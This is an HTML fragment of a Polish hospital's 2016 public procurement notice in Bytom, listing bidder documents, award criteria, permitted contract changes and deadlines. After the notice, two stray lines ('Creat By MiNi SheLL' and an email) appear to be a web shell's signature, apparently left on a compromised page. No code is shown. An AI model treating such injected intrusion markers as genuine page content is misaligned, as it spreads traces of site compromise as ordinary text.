<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo osób podpisujących ofertę w imieniu Wykonawcy, udzielone przez osobę  upoważnioną zgodnie z właściwym rejestrem. Należy dołączyć do oferty oryginał lub kopię poświadczoną za zgodność z oryginałem przez udzielającego pełnomocnictwa lub notariusza.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Czas przystąpienia do realizacji zlecenia - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, chyba że zmiana będzie dotyczyła następujących zdarzeń: 
1.	Wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy. 
2.	Wystąpienia konieczności wprowadzenia zmian spowodowanych następującymi okolicznościami: 
a)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie ze szczegółowym opisem, 
b)	zmiany danych teleadresowych, 
c)	zmiana obowiązującej stawki VAT, przy czy zmianie ulega tylko cena brutto, cena netto zostaje bez zmian
2. Wszelkie zmiany do niniejszej umowy wymagają pisemnego aneksu podpisanego przez strony lub następują z mocy prawa i obowiązują od dnia obowiązywania odpowiednich zapisów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital1.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Specjalistyczny  nr 1 ul. Żeromskiego 7, 41-902 Bytom Zamówienia Publiczne (blok III, piętro IV, pok.3).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2016 godzina 09:30, miejsce: Szpital Specjalistyczny nr 1 ul. Żeromskiego 7, 41-902 Bytom Sekretariat (blok III, piętro I).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com